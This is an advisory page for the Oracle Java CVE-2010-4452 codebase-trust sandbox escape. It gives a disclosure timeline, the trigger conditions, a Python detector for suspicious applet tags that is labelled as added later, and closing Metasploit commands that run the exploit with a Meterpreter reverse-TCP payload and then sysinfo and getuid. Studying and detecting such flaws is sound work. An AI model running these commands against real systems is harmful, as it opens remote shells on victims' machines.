Timeline :
Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI on 2010-09-28
Coordinated public release of advisory on 2011-02-15
Vulnerability details publicly released by Frederic Hoguin on 2011-03-11
Metasploit PoC provided on 2011-03-15
PoC provided by :
Frederic Hoguin
jduck
Reference(s) :
CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle
Affected version(s) :
Oracle JRE 6 & JDK 6 Update 23 and before
Tested on Windows XP SP3 with :
Oracle JRE 6 Update 16
Description :
This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with:
1. A “codebase” parameter that points at a trusted directory
2. A “code” parameter that is a URL that does not contain any dots
the applet will run outside of the sandbox.
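A defensive heuristic, added here and not part of the original page or of the Metasploit module, that scans HTML for applet invocations matching the two trigger conditions above (codebase pointing at a trusted location, code parameter that is a dotless URL). The trusted codebase prefixes and the sample HTML are assumptions constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption, not on the page: the advisory says "a trusted directory" without
# naming one; treating local-file codebases as trusted is a placeholder to tune.
TRUSTED_CODEBASE_PREFIXES = ("file:",)

class AppletCollector(HTMLParser):
    """Gather each <applet> with its attributes merged with nested <param> tags."""
    def __init__(self):
        super().__init__()
        self.applets, self._current = [], None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "applet":
            self._current = dict(attrs)
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None and "name" in attrs:
            # <param name="code" value="..."> is the equivalent of the attribute form
            self._current.setdefault(attrs["name"].lower(), attrs.get("value", ""))

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None

def is_dotless_url(value):
    """True when value is an absolute URL (scheme and host) containing no dot at all."""
    parts = urlsplit(value.strip())
    return bool(parts.scheme and parts.netloc) and "." not in value

def find_suspicious_applets(html):
    """Return (codebase, code) pairs that satisfy both trigger conditions from the advisory."""
    collector = AppletCollector()
    collector.feed(html)
    hits = []
    for applet in collector.applets:
        codebase, code = applet.get("codebase", ""), applet.get("code", "")
        if codebase.strip().lower().startswith(TRUSTED_CODEBASE_PREFIXES) and is_dotless_url(code):
            hits.append((codebase, code))
    return hits

# Constructed sample page: one ordinary applet and one matching the trigger shape.
SAMPLE_HTML = """
<applet code="Hello.class" codebase="/applets/" width="1" height="1"></applet>
<applet codebase="file:/" width="1" height="1">
  <param name="code" value="http://localhost/loader">
</applet>
"""
```

Run `find_suspicious_applets` over fetched or proxied HTML; a non-empty result is a candidate for alerting, and the benign applet in the sample shows that ordinary class names with dots are not flagged.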
Commands :
use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid